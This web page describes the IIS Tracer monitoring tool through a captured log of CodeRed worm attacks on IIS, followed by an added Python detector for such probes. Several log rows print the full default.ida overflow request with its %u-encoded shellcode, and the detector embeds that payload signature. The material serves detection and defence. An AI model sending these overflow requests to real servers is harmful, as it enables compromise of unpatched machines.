Interesting captures (CodeRed attack) with IIS Tracer web site monitoring tool

CodeRed attack on an IIS server
CodeRed exploits a buffer overflow in the Index Server ISAPI extension (idq.dll) that IIS uses to handle .ida requests: the worm sends a GET for default.ida whose query string is an over-long run of filler characters followed by a %u-encoded payload. The table below shows how IIS Tracer displays CodeRed requests arriving from other servers at your server, interleaved with ordinary traffic captured at the same time.

Start time    Inraw [B]  InContent length [B]  Outraw [B]  OutContent length [B]  Running [ms]  State           Client           Method  URL
13:59:13.554  2358       3379                  4833        2526                   14229         End of request  217.11.239.22    GET     http://217.11.235.107/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
14:03:26.104  0          3379                  0           un                     543469        Authentication  217.11.239.22    GET     http://217.11.235.103/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
14:09:54.083  0          ns                    10698       10469                  14147         End of request  62.24.71.131     GET     http://g.aliaweb.cz/cphistory.obr?LV=1&ID=965&/BLBUNIFO.gif
14:09:54.821  0          ns                    35237       34805                  13088         End of request  195.47.108.147   GET     http://zpravodaj.cz/l.asp?LT=ptEkonomika&SF=Ctenost_Celkem
14:10:01.827  2358       3379                  4833        2523                   6086          End of request  217.11.239.22    GET     http://217.11.235.108/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
14:10:50.171  2358       3379                  4653        2523                   5595          End of request  217.11.239.22    GET     http://217.11.235.111/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
14:11:01.048  0          ns                    29824       29582                  41655         End of request  212.20.109.156   GET     http://r.kde.cz/js/nh.js
14:11:25.065  0          ns                    13302       13074                  5978          End of request  213.175.33.146   GET     http://e.kde.cz/ban/zpravodaj/zpr_zelen.gif
14:11:27.309  0          ns                    28849       28624                  6274          End of request  212.20.120.122   GET     http://r.kde.cz/ban/exchange/horizont2.gif
14:11:35.157  0          ns                    29824       29582                  10039         End of request  195.144.126.39   GET     http://r.kde.cz/js/nh.js
14:11:47.583  0          ns                    26672       26444                  9138          End of request  195.212.204.131  GET     http://e.kde.cz/ban/akcie/fio_ban1.gif
14:11:50.371  0          ns                    28849       28624                  11891         End of request  193.165.145.88   GET     http://r.kde.cz/ban/exchange/horizont2.gif
14:12:28.297  0          ns                    0           un                     1275          URL Mapping     194.228.119.18   GET     http://www.ariadna.cz/ariadna/getCal.asp?ID=44&head=1&Langver=1&T=MGDRIOC&sort=1&DESC=1

Reading the table: Inraw and Outraw are the raw request and response byte counts, InContent length and OutContent length the content lengths; the four CodeRed rows all declare 3379 B of request content. "ns" appears only in InContent length for requests that carry no body, and "un" only in OutContent length for the two requests still in progress (states Authentication and URL Mapping). The Running [ms] values of those two rows both place the snapshot at about 14:12:29.57. Note that the one client 217.11.239.22 probes four addresses of the same 217.11.235.x range (.103, .107, .108, .111) within twelve minutes, which is the worm's scanning pattern as seen from a server that answers on several IP addresses.
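The same distinction IIS Tracer lets an operator make by eye can be automated. The following Python is an added example, not code from the page or from IIS Tracer: it takes rows in the shape of the table above (constructed here, with the CodeRed query string abbreviated to a long run of X characters rather than the exact capture), flags .ida requests that carry either an over-long single-character filler or the %u-encoded nop words that open the CodeRed payload, and groups the flagged requests by source so that one client walking through several of the server's addresses shows up as a single scanner. The 200-character filler threshold and the row layout are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample rows in the shape of the IIS Tracer table:
# (start time, client IP, method, URL, state). The CodeRed query is
# abbreviated; the real one on the page is several hundred characters.
CODERED_QUERY = ("X" * 224
                 + "%u9090%u6858%ucbd3%u7801" * 3
                 + "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a")

SAMPLE_ROWS = [
    ("13:59:13.554", "217.11.239.22", "GET", "http://217.11.235.107/default.ida?" + CODERED_QUERY, "End of request"),
    ("14:03:26.104", "217.11.239.22", "GET", "http://217.11.235.103/default.ida?" + CODERED_QUERY, "Authentication"),
    ("14:09:54.083", "62.24.71.131", "GET", "http://g.aliaweb.cz/cphistory.obr?LV=1&ID=965&/BLBUNIFO.gif", "End of request"),
    ("14:10:01.827", "217.11.239.22", "GET", "http://217.11.235.108/default.ida?" + CODERED_QUERY, "End of request"),
    ("14:10:50.171", "217.11.239.22", "GET", "http://217.11.235.111/default.ida?" + CODERED_QUERY, "End of request"),
    ("14:11:01.048", "212.20.109.156", "GET", "http://r.kde.cz/js/nh.js", "End of request"),
    # Constructed negative case: a legitimate .ida hit with a short query must not be flagged.
    ("14:12:00.000", "10.0.0.5", "GET", "http://r.kde.cz/search.ida?q=test", "End of request"),
]

# Signal 1: the overflow needs a long filler of one repeated character at the
# start of the query (CodeRed variants used runs of N or X). 200 is an assumed
# threshold, well below the real filler length and well above any sane query.
FILLER_RE = re.compile(r"^([A-Za-z])\1{199,}")
# Signal 2: the %u-encoded words that open the CodeRed payload (from the page's capture).
NOP_SLED = "%u9090%u6858%ucbd3%u7801"


def is_codered_probe(url: str) -> bool:
    """True if the URL is an .ida request carrying a CodeRed-style overflow query."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(".ida"):
        return False
    query = parts.query
    return bool(FILLER_RE.match(query)) or NOP_SLED in query.lower()


def scan_sources(rows):
    """Map each client that sent a probe to the sorted list of target hosts it hit.

    Rows are (start, client, method, url, state) tuples as in SAMPLE_ROWS.
    """
    targets = defaultdict(set)
    for _start, client, _method, url, _state in rows:
        if is_codered_probe(url):
            targets[client].add(urlsplit(url).hostname)
    return {client: sorted(hosts) for client, hosts in targets.items()}


if __name__ == "__main__":
    for client, hosts in scan_sources(SAMPLE_ROWS).items():
        print(f"{client} probed {len(hosts)} hosts: {', '.join(hosts)}")
```

Matching on the path plus the query shape, rather than on the literal capture, also catches the N-filler variant and payloads with a different tail; a request to an .ida file with a normal query is left alone, so the check can run over a whole day of trace rows without flooding the operator with false positives.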

© 1996-2007 Antonin Foller, Motobit Software, help@pstruh.cz